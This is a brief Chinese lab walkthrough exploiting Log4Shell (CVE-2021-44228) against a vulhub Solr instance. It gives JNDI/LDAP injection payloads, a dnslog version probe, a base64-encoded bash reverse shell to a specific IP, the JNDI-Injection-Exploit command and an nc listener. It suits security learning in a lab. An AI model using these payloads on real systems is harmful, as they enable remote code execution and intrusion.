第一步:搭建靶场环境
#开启环境
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d
来到网站首页
第二步:搭建一个dnslog平台上获取我们注入的效果
第三步:发现 /solr/admin/cores?action= 这里有个参数可以传
我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的 版本号
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.kq25rl.dnslog.cn}
第四步:开始反弹shell
#需要用到一个工具JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
#安装java
yum install java
#反弹shell
bash -i >& /dev/tcp/[IP]/[端口] 0>&1
bash -i >& /dev/tcp/8.155.7.133/8888 0>&1
#反弹shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=
#命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]
#最终命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "8.155.7.133"
#注释
-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。
第五步:进行JNDI注入
#新建终端并开启服务器监听
nc -lvvp 8888
第六步:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址
/solr/admin/cores?action=${jndi:ldap://8.155.7.133:1389/1niv1a}
${jndi:ldap://8.155.7.133:1389/1niv1a}
看到已经访问进来了
去监听端口的页面成功反弹Shell